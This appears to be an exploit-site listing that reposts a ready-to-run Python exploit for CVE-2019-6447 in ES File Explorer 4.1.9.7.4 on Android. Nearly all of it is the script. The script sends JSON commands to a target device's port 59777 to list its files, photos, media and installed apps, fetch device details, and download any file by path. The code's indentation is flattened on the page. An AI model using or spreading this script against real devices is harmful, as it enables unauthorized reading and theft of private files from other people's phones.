Exploit for ES File Explorer 4.1.9.7.4 Arbitrary File Read CVE-2019-6447

Name: Exploit for ES File Explorer 4.1.9.7.4 Arbitrary File Read CVE-2019-6447
Rating: 5 (184 reviews)
2021-06-29 | CVSS 4.8
## https://sploitus.com/exploit?id=PACKETSTORM:163303
# Exploit Title: ES File Explorer 4.1.9.7.4 - Arbitrary File Read  
# Date: 29/06/2021  
# Exploit Author: Nehal Zaman  
# Version: ES File Explorer v4.1.9.7.4  
# Tested on: Android  
# CVE : CVE-2019-6447  
  
import requests  
import json  
import ast  
import sys  
  
if len(sys.argv) < 3:  
print(f"USAGE {sys.argv[0]} <command> <IP> [file to download]")  
sys.exit(1)  
  
url = 'http://' + sys.argv[2] + ':59777'  
cmd = sys.argv[1]  
cmds = ['listFiles','listPics','listVideos','listAudios','listApps','listAppsSystem','listAppsPhone','listAppsSdcard','listAppsAll','getFile','getDeviceInfo']  
listCmds = cmds[:9]  
if cmd not in cmds:  
print("[-] WRONG COMMAND!")  
print("Available commands : ")  
print(" listFiles : List all Files.")  
print(" listPics : List all Pictures.")  
print(" listVideos : List all videos.")  
print(" listAudios : List all audios.")  
print(" listApps : List Applications installed.")  
print(" listAppsSystem : List System apps.")  
print(" listAppsPhone : List Communication related apps.")  
print(" listAppsSdcard : List apps on the SDCard.")  
print(" listAppsAll : List all Application.")  
print(" getFile : Download a file.")  
print(" getDeviceInfo : Get device info.")  
sys.exit(1)  
  
print("\n==================================================================")  
print("| ES File Explorer Open Port Vulnerability : CVE-2019-6447 |")  
print("| Coded By : Nehal a.k.a PwnerSec |")  
print("==================================================================\n")  
  
header = {"Content-Type" : "application/json"}  
proxy = {"http":"http://127.0.0.1:8080", "https":"https://127.0.0.1:8080"}  
  
def httpPost(cmd):  
data = json.dumps({"command":cmd})  
response = requests.post(url, headers=header, data=data)  
return ast.literal_eval(response.text)  
  
def parse(text, keys):  
for dic in text:  
for key in keys:  
print(f"{key} : {dic[key]}")  
print('')  
  
def do_listing(cmd):  
response = httpPost(cmd)  
if len(response) == 0:  
keys = []  
else:  
keys = list(response[0].keys())  
parse(response, keys)  
  
if cmd in listCmds:  
do_listing(cmd)  
  
elif cmd == cmds[9]:  
if len(sys.argv) != 4:  
print("[+] Include file name to download.")  
sys.exit(1)  
elif sys.argv[3][0] != '/':  
print("[-] You need to provide full path of the file.")  
sys.exit(1)  
else:  
path = sys.argv[3]  
print("[+] Downloading file...")  
response = requests.get(url + path)  
with open('out.dat','wb') as wf:  
wf.write(response.content)  
print("[+] Done. Saved as `out.dat`.")  
  
elif cmd == cmds[10]:  
response = httpPost(cmd)  
keys = list(response.keys())  
for key in keys:  
print(f"{key} : {response[key]}")